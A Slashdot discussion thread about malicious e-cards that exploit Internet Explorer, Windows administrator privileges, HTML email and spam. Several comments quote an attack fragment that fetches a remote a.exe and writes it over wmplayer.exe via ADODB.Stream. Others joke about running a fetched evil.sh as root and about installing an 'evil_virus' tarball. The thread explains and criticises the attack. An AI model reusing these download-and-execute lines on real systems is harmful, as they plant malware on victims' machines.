This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.

Re:It'd be scary if I ran my PC as Administrator..

[clester]

You mean it could overwrite /usr/bin/xmms?

I hate spam

[nycsubway]

I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:

- spam is cheap to produce
- a sucker is born every day
- even if 70% of the spam sent out doesn't get to it's destination, millions of messages will still be received
- spam filters are not installed on all mail servers
- spam is CHEAP to produce (again)

Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.

How can email on the internet remain free/cheap and still not allow spam to run rampant?

Re:I hate spam

[mog]

I was under the impression that the rate of production of suckers was one per minute. Have we made headway in stemming this epidemic?

noHTML for Outlook Express

[TasosF]

Quote from that article:

Conclusion

If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest FireFox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

Or alternatively,

you can use an HTML disabler like noHTML for Outlook Express

Ugly is what ugly does

[broothal]

This looks pretty ugly:

x.Open("GET", "http://adversting.co.uk/a.exe",0);

and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea .. ever </Comic book guy>

Re:Ugly is what ugly does

[JCMay]

What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.

There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

Re:Ugly is what ugly does

[CTachyon]

Actually, that bit of code just downloads the malicious .EXE. It's a bit dodgy that it's allowed to do it automatically (after all, it could be asking for http://spy.malware.com/cgi-bin/report?firstname=Jo hn&lastname=Doe&underwear_type=boxers...), but it's not an instant security breach itself. The actual bug is...

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

...which overwrites Media Player with the downloaded malware using ADODB.Stream (which probably never should have been enabled as a trusted ActiveX control in the first place, and certainly shouldn't be automatically overwriting files without user intervention).

Re:It'd be scary if I ran my PC as Administrator..

[ggvaidya]

oops ... silly me ... obviously, I meant your Microsoft(R) Windows(TM) Media Player. Nope, sorry, the quick file replacement is a feature found only on Microsoft(R) systems. Us poor Linux lusers will have to use 'apt-get install' or other equally slow technique.

Redndant, I know. Don't run as Administrator.

[gfecyk]

I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

Then the evil e-cards can't overwrite wmplayer.exe or anythingelse.exe because regular users don't have write access to the Windows directory or the Program Files directory, where they're stored.

The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root. Everyone here keeps missing the underlying problem because of their anti-M$ bias. Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

Re:Redndant, I know. Don't run as Administrator.

[krray]

I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

Tell you what sparky -- YOU try that across a enterprise type installation. Actually there is ONE (1) remaining application running across any of my networks that requires Windows (2K) boxes to remain until something else is phased in: AUTOCAD.

Go ahead -- try to install and run AutoCAD (2004 release) with Architectural and Mechanical desktops loaded ... as a regular user. I'd love to see you get AEC content networked and working on a local machine as a regular user. Good luck.

Fortunately the engineering types are special. They've got TWO computers now. 90% of their work is done on CAD which is Windows right now -- the other 10% they tap the Mac for services (file processing, email, web, word, whatever).

Every other sub-system requiring Windows has been replaced (for us -- started in 2000) and I have to agree with you 100% otherwise: regular users have no reason to run anything as administrator or "root". Just can't do that in the Windows world...

Re:Redndant, I know. Don't run as Administrator.

[reuben04]

I agree with your statement, but many of the windows based line of business applications out there "require" administrative privileges to run properly, forcing users to have administrative permissions. This is also an issue that I have not seen people thinking about lately.

Re:Redndant, I know. Don't run as Administrator.

[nehril]

sure, and then your CD burner doesn't work. or your scanner doesn't scan. there are LOTS of end user programs out there that assume and require that you run with Admin priviledges.

That being said, having IE download and run executables remains risky even if you are not admin: a trojan/backdoor can just as easily run from your home directory or your own "Startup Items" folder.

the intrepid attacker can then run all manner of other exploits/social engineering once he has a local irc zombie. Of course, the sad truth is that none of this is necessary. Just send a plain zipped virus.exe and lots of people WILL run it.

Re:Redndant, I know. Don't run as Administrator.

[JTunny]

Switching between user levels on windows isn't as simple as it is on a *nix machine. The time/memory overhead switching would send me crazy.

Re:Redndant, I know. Don't run as Administrator.

[Tom]

The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root.

True, good point.

Everyone here keeps missing the underlying problem because of their anti-M$ bias.

True as well. However, it does contribute very much that windos very much encourages this unsafe behaviour, while all Linux and *BSD systems I know go to great pains to discourage it.

Re:Redndant, I know. Don't run as Administrator.

[rbanzai]

Okay, run as a Regular User under Win XP.

Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.

Wheee!

Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.

Re:Redndant, I know. Don't run as Administrator.

[0123456]

"The same thing can happen to an idiot running Mozilla under Linux as root,"

Except:

a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.

b) thanks to the wonder of modern miraculous setuid technology, there's no log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.

c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.

Those are just three reasons why most people run as Administrator on Windows and don't on Linux.

Re:Redndant, I know. Don't run as Administrator.

[ktulu1115]

You seem to be missing the point. Browsers shouldn't allow this:

x.Open("GET", "http://adversting.co.uk/a.exe",0);
s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
etc...

This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but thats not an excuse for IE's pisspoor security.

Re:Redndant, I know. Don't run as Administrator.

[just+fiddling+around]

So the solution to stupid system design is rewarding stupid system designer by buying a new version?!? No sane person would do that for a car! I am certain nobody would have bought a Pinto II because the Pinto was "supported no more and it is their fault they still drive an exploding car because the new version is all right".

Re:Redndant, I know. Don't run as Administrator.

[upside]

It's atrocious how Windows apps STILL don't get written for multiuser and low-privilege user environments.

Take for example Adobe's Photshop 7 and Pagemaker 7. These came out way after Win2K. You have to make their respective folders and registry entries world writable before they start working for normal users.

I'm not sure about the latest CS versions, but I have my doubts.

Re:Redndant, I know. Don't run as Administrator.

[seanvaandering]

Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

Sometimes its needed to be said, and I'll agree, as a linux newbie in my own right, I knew enough to know that running as root on my machine was the stupidest thing I could do. Also in Mandrake 9.2 - if you DO try to log in as root, your desktop is completely RED - a very annoying, but effective color.

I think the biggest problem is that people think that because they OWN their computer that they should immediately have full access to EVERYTHING, including the fact that i have the right to run as administrator. Now I'm not debating that you can't run as admin, I'm stating that if someone made you a pilot today and gave ya a nice DC-10 on the runway, just because someone gave you something you have no clue how to use, would you just go and run with it? The unfortunate part is that computers look and act so "easy-to-use" - that while happy user is happily clicking away on "remove spam from your e-mail - click here" windows, that the damage is already being done - and they don't even know it. Now heres the catch: when you TELL them that you should run as a regular user, they look at you like you came from another planet and say "yeah right - its my computer and I'll damn well do what i please with it!" - which is great until they start calling you up for tech support because "It runs slow", or "It doesn't work" or [fill in your worst nightmare here].

Cheers.

German dialer spam gangs used "e-cards", too.

[DocSnyder]

About a year ago, German email users have been spammed with similar e-cards, which claimed to need a special presentation plugin. The "plugin" actually dialed an expensive premium-rate service number. Despite thousands of victims complaining about high phone bills, it took about a year to stop this kind of fraud.

Equivalent of chmod 700 for Windows

[gfecyk]

> Hey Microsoft -- this would a HINT for inbound type files:
> $ chmod 700 a.exe

Similarly, deny Execute permssions in %temp% to regular users and even power users with NTFS permissions. Sure this isn't done by default, but it only needs to be set once.

In a corporate environment under Win2K or XP, you can deny Execute permissions for the entire Documents and Settings folder, where each user's %temp% is stored, and also for %systemroot%\temp if you actually still run 16-bit programs.

Using Mozilla on Windows won't protect you ...

wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

My solution: I renamed wscript.exe and cscript.exe so they can't execute.

Re:Using Mozilla on Windows won't protect you ...

Wscript is the default app for .js and .vbs files. All you have to do is change the launching program. You could set them to open with notepad instead. Here's a batch file, save it with a .bat extension:

ftype JSFile=%SystemRoot%\notepad.exe "%1"
ftype VBSFile=%SystemRoot%\notepad.exe "%1"

Amazing, really

[mao+che+minh]

It still amazes me that people (the average user, I should say) can not grasp the reality of the Internet: your system, in the safe confines of your home, is connected to a network of billions. Anyone capable of reaching the Internet can reach your system. The world is full of villians.

And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.

If you use Outlook for your mail..

[JasonUCF]

You need SpamBayes. The beautiful folks behind it have included an Outlook plugin. Now you can knock your bayesian filter self out with a self contained easily run end-client solution. In smaller words, no need for anything fancy from your ISP, just install, plug, and play. In the few days I have used it my spam has literally dropped to 0. Spams are nailed before I even see them show up in the INBOX (it's that fast).

Go check it out. It's really, really, good, and free, as in, well, um, beer?

I have spent too many hours building elaborate rule sets, banning Class A IP's, keyword filters, etcetera. The spam still gets through and it carries nasty payload half the time. Bayesian...bayesian... bayesian...

I got one yesterday

[swb]

Was the e-card itself (as viewed at the web site 123greetings.com) a problem, or was it the message itself the problem?

I get those stupid e-cards from relatives occasionally, and I never open the messages in anything but pine because they're usually loaded with crap I don't want to run.

In this case, I viewed the email in pine, copied the ecard number and viewed the stupid thing on the web site, presuming it would be from my brother (an AOL lifer), since it was my anniversary. It was unattributed on the site, so I figured it was just a spam/traffic generator.

"Sparky" does this on clients' Enterprises.

[gfecyk]

> Tell you what sparky -- YOU try that across
> a enterprise type installation.

Done. Twice.

I'm an IT consultant, a professional. I practice what I preach and I test things. I bounce applications that don't work with MY security standards. And I'm paid well for it.

I've massaged very broken applications into a secured environment. I'm talking about really broken, designed-for-16-bit-windows applications. I've never worked with recent versions of AutoCAD but, after at least ten years of developing for 32-bit Windows, and with Win2K being four years old, Autodesk has no excuse.

overwrites wmplayer.exe??

[p4ul13]

Well ok; so it's not ALL bad then.

Re:e-cards

How do e-card services make money?
The less moral ones sell the email addresses they hervest from every ecard- both sender and destination.

To prove this, get 2 fresh email addresses. send an ecard from one to the other. Watch the spam roll in.

Replace the software or replace the vendor.

[gfecyk]

CD burners: Roxio EasyCD Creator 5 and later work as regular users.

Scanners: I know HP doesn't support some older scanners under Win2K. Later HP ones, especially USB based ones, work fine as a regular user. The combo printer/scanners I've seen work fine as a regular user.

Programs that require Admin: That's why we have competition. I've massaged some badly behaving apps into working as a regular user - it's not hard to loosen up the minimums an app "needs". It's even easier to go to their competition (Quickbooks vs Simply Accounting: One works as a regular user, one requires "power user." Which one did I recommend?)

As for the plain "zipped-idiot.exe" e-mail? That's what Outlook 2000 and later are for: "Outlook has blocked access to the following attachments: this-is-a-bomb.exe/scr/bat/com/etc"

Launching Files

[ticklemeozmo]

Actually, at one in time (DotCom boom maybe?, remember "Active Desktop", the whole point of "portals") the browser was SUPPOSED to do anything and everything. Your browser was supposed to be your desktop and that's how you'd do stuff.

That was the point of a "home page", you could get your news and start up Word all on the same page.

Virus vs. Spam

[the+grace+of+R'hllor]

Because Viruses can do better with some effort.

MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

E-mail just can't beat those times.

E-cards are EVIL

[rqqrtnb]

Why do people still insist on using e-cards?

They are spam harvesters. Nothing more.

I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.

Do I need to attach a note to my emails?

If you are thinking of sending me an e-card:

• I will be changing my email address address again, much to the chagrin of everyone else.

• Since you have have proved incapable of not providing spammers with my personal email address, you will NOT be receiving the new one.

• You are now limited to traditional (non 21st Century) forms of communication with me.

What possesses people to do it?

Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...

Bastards.

Re:E-cards are EVIL

[cybergrue]

Why do people still insist on using e-cards?
What possesses people to do it?
Because they think that it is exactly the same as sending you a physical card, just updated for the 21 centry. They have absolutly no idea that there can be a down-side to these things because they are thinking of it in terms of a physical card. They are probably thinking that since you use a computer a lot, then you will like to see a greeting card on your computer. I know, I have a lot of relatives that have done this in the past, and it took a lot of explaning to them why this was a really bad idea.

My spam with full header database

[leoaugust]

.
I have been putting my spam with full headers here, and hope that people investigating can use the info in the headers like IP addresses, gateways, aliases etc. As it is cached in Google so the results should show up for specific keywords.

If you are spam hunters, please be my guest and fry some spammers a***

.

Oh boy...

[mog007]

I've got a /. rss feed through a Trillian plug-in, and my window was sized just right to make the title of the article:
"Malicious E-Cards" - An anal...

I thought goatse was coming back... in the form of email.

*Shudder*

Security through obscurity DOES work

[Kombat]

Security through obscurity never works

Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazzaa returns 0 results. Security through obscurity worked in this example.

Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, Whitehouse, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.

I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.

Re:Security through obscurity DOES work

[Sgt+York]

Well, security through obscurity works, but only when the obscurity is at or very near 100%. In the Pentagon, no one is allowed to see the layout, and only certain people are allowed to interact with any part of it. The McVeigh execution was the same way, no one got to see any details of it. IIRC, the exact time/date wasn't even announced until the last minute.

However, in software you can't have that near 100% obscurity because large numbers of people have to use the software. Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis, the security would eventually break down. The floor plan would eventually be at least partially elucidated and this could allow further security breaches, leading to the discovery of more of the floor plan, etc.

The whole point of making software (like this) is so that lots of people will use it routinely. This high volume, routine use does eventually lead to a breach in the security of the software.

I agree that the flat, absolute statement "security through obscurity never works" is incorrect. However, that pure obscurity is exceptionally rare, alomst to the point of nonexsistence in the software world.

Re:e-cards

[Brandon30X]

I always send them to myself, to an address that already gets TONS of spam. Then I simply forward the card to whoever, and let them know I sent it to myself to respect their e-mail privacy.

Which brings up a good question. Would anyone be offended or mad at someone who sent you an ecard to an e-mail address you keep clean of spam?

OR

[diablobynight]

You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean their are times when I take the chance, but lets face it, how often do random people email your personal account? And if your talking a webmaster or sales account, then yes, turn off html, or have your IT guy set up your securities properly.

Re:OR

[RetroGeek]

You could just simply not view messages from people you don't know.

Otherwise known as a white list.

Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.

And this is the real bad effect that SPAM has created. We no longer trust strangers.

Sigh...

Re:OR

[diablobynight]

did you not read, I sometimes do read unknown email, meaning, I personally filter it, I don't use a refuse all unknown white list. And if I saw, the subject said, In response to Slashdot, or something else that I was aware I was posting to, or investigating, then I read it with HTML turned off, but if it's from my buddies I read it with HTMl on, if it's from my mom or any girl for that matter, I turn HTML off. lol know your email sender, and adjust accordingly.

Re:OR

[misleb]

You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you, I mean their are times when I take the chance, but lets face it, how often do random people email your personal account?

I get the occasional email from strangers or people I don't normally communicate with via email. For instance, someone from Usenet or a mailing list might email me. I'd hate to miss any one of those. I think it is reasonable to tell people not to open strange attachments, but it isn't reasonable to suggest that people don't even open an email from a stranger. That is just paranoid and unnecessary with reasonable measures taken. Turning off the stupid HTML "feature," don't open strange attachments, run a Bayseian SPAM filter,and everything should be just fine.

-matthew

Re:OR

[Spoing]

1. And obviously if Incredimail's advertising says it's "safe, fun, and cool", and CNet gives it a #1 software, and ZDNet and Tucows both go gaga over it, then it must be great, and it's me that's broken.

Tell them it looks like *rap on your end -- send them a quoted example that does not render -- and that you never view HTML because of security concerns. Faking addresses is too common now, so it's not them, it's the spammers.

My father used to do the same thing, but after a few reminders he asked how to change it. The next time I visited -- click click -- it was disabled. He hasn't complained since...though he's not in the 'purple fairy background and bold pink text' crowd. Show them how ugly it is, and they might be convinced (OK, not likely, though let them know you don't see what they see).

Re:OR

[Reziac]

There's also the little minor issue that even people on your whitelist can unknowingly send you malicious email.

Realworld example: My sister (who, *if* I used a whitelist, would naturally be on it) added some downloaded toolbar to her browser, which in turn reformatted her email as it was being sent (she never saw the alterations)... and what I got in my mailbox was HTML formatted, with javascript that tried to fetch and install the same spyware toolbar (but was foiled by my braindead mail client).

And other folks on private mailing lists I'm on (which would also be whitelisted) have also unknowingly sent virus attachments. This happened on a mailing list populated by sysadmins, not exactly "regular users who don't know anything".

Crap, now I gotta go find another story to spend my mod points on :)

NO, it's the INTERFACE.

[tentimestwenty]

I agree the users are a big problem, but the technology is horrible too, not just in Windows but all OSes. The Mac is the only system that balances the user's need to accomplish things with the protection to not do something catastrophic. It doesn't do this through tons of "Are you sure..." dialog boxes, or with Orwellian security routines, and not even through add-on programs which check up on viruses and backups.

The Mac simply has a user interface that allows you to do the things you want to do. It sounds simple, but most Mac users don't ever get to the point of confusion where they might do something stupid. The terminal isn't right there on the desktop, it's not even in the Applications folder. It's in a folder called Utilities. The Windows folder is such a generic name, it's a likely candidate to be "cleaned out" by a curious user. On the Mac it's called System which has an obvious connotation that it's important to running your computer. I could go on and on.

The interface of the machine is the easiest way to educate users. Make it intuitive and even a novice is going to play safe.

Probably an autoproxy, not a virus

[philg]

I was analyzing something very similar around October of last year when I worked here. They probably aren't installing a virus, per se -- more like an autoproxy which they will use to send spam or install more malware (e.g., to steal passwords or credit card numbers).

All the vulnerabilities mentioned in the article have been known for quite some time. Liu Die Yu's Unpatched IE vulnerabilities page documents several of these in detail, with exploit examples. (Note that some of the links on Liu Die Yu's site may result in popups, ironically.)

When I took a look at it, the proxy flavor of the month was most commonly referred to as ap216.exe the filename is irrelevant, obviously). A good description of it is here, in the context of its use in a phishing scam.

Note that everything done in this attack will blithely go through most firewalls -- almost all connections are initiated from within the network. Firewalls are an increasingly inadequate means of protecting users from organized and motivated attackers. IMO, any network admin who doesn't run deep-packet inspection firewalls, intrusion prevention, or security-minded filtering application proxies is asking for it.

Sure, someone could write something to quietly delete all the files on your hard drive. I'm sure he'd rather have all the spam your machine can send, or all the money from your bank account.

phil

patching

[Metaldsa]

Isn't it funny how we have people complaining how windows auto-update can download patches automatically into users machines and how this is dangerous but at the same time we blame these windows users for not updating their pcs. So when you have tens of millions of windows pcs would you rather MS update them automatically or not? This is problem a dumb question because I bet the /. crowd is divided on it as a matter of privacy and annoyance.

"Run as"

[autechre]

Windows 2000 and up have "run as" functionality, which allow you to run binaries as another user (normally Administrator). Just right-click on it.

I have everyone running as "Power Users" on Win2k desktops, and I'm considering trying to get that down to the lower setting where nothing can be installed.

Re:"Run as"

[ameoba]

isn't shift-right-click?

Monitoring...reputable...contradiction

[Pac]

The phrase "a reputable Russian monitoring site" only makes sense if you think monitoring is a reputable business. I don't consider doubleclick reputable. I don't think anything in, near or around the advertsing industry can be reputable. But that's just me, move on, nothing to see here.

Check out Qwik-Fix.

[autechre]

Remember Pivx Labs, the folks that used to host the "21 unpatched vulnerabilities in IE" page and has since switched to being a slight MS apologist? They've got a nice product which is (currently) free. What they basically did was to tighten down Windows via things from standard settings to registry tweaks to a degree which most users won't notice. Several of the recently discovered IE vulnerabilities wouldn't have worked, and Blaster wouldn't have worked either under these settings.

After trying it on my workstation for a couple of weeks, I've started deploying it to others. It seems to interfere with Norton Antivirus, though not McAffee (which is what UMBC machines should be using anyway).

I also send out the desktops with Mozilla, Media Player Classic, RealAlternative, etc. If people want IM, I try to recommend GAIM. Open source apps tend to have been "written in a more paranoid age" as another poster put it, and also can't as easily get away with doing dumb crap. I also remove the IE and Outlook shortcuts from the desktop (but leave the IE shortcut in the start menu, because the eternally pending PeopleSoft requires it).

Spy.htm: honey pot potential

[Ktistec+Machine]

Here's a honeypot idea: use the "spy.htm" code to add a machine to the attacker's "spy" log, then wait....

Yes , indeed!

[Viol8]

As a linux user I have to be very careful when I upload windows .exe files just in case they do something nasty like , umm ... use up diskspace
on my drive? Oh , but perhaps the spammer will get me to run a linux binary and I wouldn't have a clue what was going on as I saved the binary to my disk
, opened an xterm , typed in its name and ran it? Yes , he'll have me fooled no doubt about that!

Re:Yes , indeed!

[ONOIML8]

If you've never heard of a Linux or Unix program or script being compromised, you lead a sheltered life. So you review the source from start to finish before you complile and only run binaries from a trusted source...which of course could never be compromised. Great.

And I know that it's impossible to find any flaws in Linux based software that could be taken advantage of by someone of ill intent. But I'm not sure that the malicious coders recognize that as truth.

But as the user bases grows there are more and more users who arent as cautious as you. And, as the user base grows, there will be more of those sick fscks looking to cause you harm.

Re:Yes , indeed!

[Viol8]

Sorry, I'm a bit confused. Please tell me how a mail program that only deals with plain text can be compromised? When you've done that then tell
me how a binary will get run without me knowing it via email. And after that explain why I would be dumb enough to run ANY executable from an unknown source
that had not been suitably verified first and even then why exactly would I run then as root user so they could do some serious harm without testing it in a chroot jail first?

Re:Yes , indeed!

[ONOIML8]

First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.

I am not an expert in these things, so I won't bother to try to figure out how they can be done. I do know that much is possible. As an example, when I first left the BBS's and got on the internet I received an email warning me about an email going around that would wipe your hard drive clean if you opened it. I passed it on to my step-father, an engineer for the Navy working on a NASA base. He passed around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible. Do you agree with them today? 100 years ago most experts would have told you that landing on the moon was not possible. Nor was breaking the sound barrier. Please don't limit your imagination. I can assure you that the sick fscks out there aren't so limited.

Look beyond things transmitted by email. Every day people find flaws in your favorite operating systems including ways to gain root access and do as they please. And every day someone is fixing that kind of problem. Every day we learn something new which often requires us to change software and change the way we run it to improve security.

You sound very confident that you are secure, that it can't happen to you. I think you have a false sense of security. If you and your system were perfect, totally secure and immune to tampering by someone from the outside....well, you would have solved the problem for everyone. You'll be in high demand.

Oh, and about that plain text email....yeah, you do study all the source for your email reader before you compile it. Right?

Hey, it had a EULA...

[MadAnthony02]

the buddylinks spyware that the OP refers to actually pops up a box, complete with a link to a EULA, to accept or stop the install.

The text of the EULA lists all the stuff that it does - send ads out to other people on your buddy list with no action on your part. And yet people agreed to it. And in general, shrink wrap/click wrap licenses have been held as legal.

The problem is once again human nature - people are used to clicking yes on those boxes because they were originally for stuff you actually needed to view a webpage (Windows Update, shockwave and flash plugins, ect). People don't bother reading them, just click yes, and wind up installing toolbars, gator, weatherbug, bonzibuddy, and the rest of that crap.

Re:How Turn off HTML in Mozilla e-mail client?

[ortholattice]

I can't find a way.

View -> Message Body As -> Plain Text

More exactly...

[abb3w]

The "Administrators". "Users", and "Power Users" groups all exist on WinXP home&pro. Of course, you need to know to go into the MMC computer management snap in and change the users' groups manually.

Yes

[bagofbeans]

Ecards, party organise sites also.

I also nicely ask people who send me 'interesting' stuff (jokes/politics/whatever) and cc people I don't know not to do it again. The second offense, I am ruder. I have had no spam ever on my 3 yr old yahoo address...

Re:It'd be scary if I ran my PC as Administrator..

[cyt0plas]

You have received an E-Card. If you're using Outlook[express], you are already infected.

For unix/linux users, run "exec -o lynx --dump http://oursite.com/evil.sh". This command should be ran as root. You may need to compile lynx from source.

I'm quite sure...

[Kjella]

I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.

...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. Then real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.

Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.

It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.

They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.

But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.

So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.

Kjella

Obvious, but too good to miss...

"To view this e-card, please move the attachment to your home directory, then open a konsole window and enter these commands:

cd ~
tar xzf evil_virus.tar.gz
cd evil_virus
./configure
make
su root (enter your root password when prompted)
make install
/usr/local/bin/evil_virus

Congratulations! Your greetings card will now be displayed!"

Re:e-cards

[gnu-generation-one]

"What really annoys me about e-cards is that even the legitimate ones look like spam"

Send people a tutorial on how to _attach_ the cute picture to the email, and write the text themselves?

Saves us all time...

Keep HTML ditch activex

[gad_zuki!]

The only real "exploit" here is the activeX installer. Most email clients render plain-text URLs clickable anyway.

There's a reason why this stuff is written with activex controls - they look official like they're from the operating system. Disable activex and watch the spyware go away. It seems most people know not to download an .exe but think activeX, expecially when its "signed," means that its safe.

Nice Spin, MS

This article describes a new feature that is added to Outlook 2002 in Microsoft Office XP Service Pack 1 (SP-1)... Click Start, and then click Run. In the Open box, type regedit...

Was the (Cough) "new feature" originally only intended for internal use (where they know how really risky using their own products can be), or is Regedit going to replace menus in future versions of Windows?

Are Unix systems secure?

[cpghost]

As Unix(*) users, we feel pretty confident when confronted with this kind of a.exe crap. But seriously, what would have happened, if the file was a Linux executable? A shell or perl script? Are we still secure? Maybe, maybe not:

• It depends what browser we're using. Browsers on Unix normally don't execute remote code, but the more browsers we use, the less we can be sure.
• Are our rendering engines (Gecko and Konqueror) really immune to buffer overruns of malicious web sites? We don't know for sure. Most of us are aware of Konqueror dumping core, but no harm is done, because a Windows virus couldn't start. What if the remote site contained valid Linux instructions instead?
• A whole class of vulnerabilities consists of so called cross site scripting vulns (see bugtraq).
• Even if an executable runs with the permissions of a regular, non-root user, are we still secure? I've seen setups where the user was member of group 0 (wheel), which opened up a whole lot of potential vulnerabilities.

The biggest asset of the Unix community is still the high level computer literacy amongst its users. We're smarter than regular Windows users on the average, and we know better than to blindly click on links when we're being told to. But with growing Linux popularity, we're bound to "inherit" more unsavvy and clueless computer users, which would be just as malleable as Windows users.

The last line of defense(tm) consists of just two principles:

• We don't run our browsers in kernel mode.
• We don't use the root account for regular activites (right?).

Will that be enough, once spammers start targetting Linux? Let's hope for the best.

(*) Unix in the generic sense, not Darl's.

Sigh scare mongerer.

[SmallFurryCreature]

Repeat after me. HTML RENDERING IS NOT HARMFULL. We are here on slashdot not the bloody bbc. All that rendering html in an email could do is send info that you read the email by opening a link to a server under a spammers. Yes this is undesirable since it allows them to verify a spammed address is alive.

Nothing else. All the other troubles are due to the execution of scripts. If the various graphical email programs would just stick to rendering html and leave javascript and others untouched then there would be no email-virusses. (well except for the ones launched through buffer overflows)

So it would only require a little bit of thought to give people the "nice" look off html email without the security problems. Prohibit external links and only allow links to attached files (wich since they are links without script can't be executed until the viewer clicks them) and you will even remove the privacy invasion. All the attractiveness of the web without the insecurity.

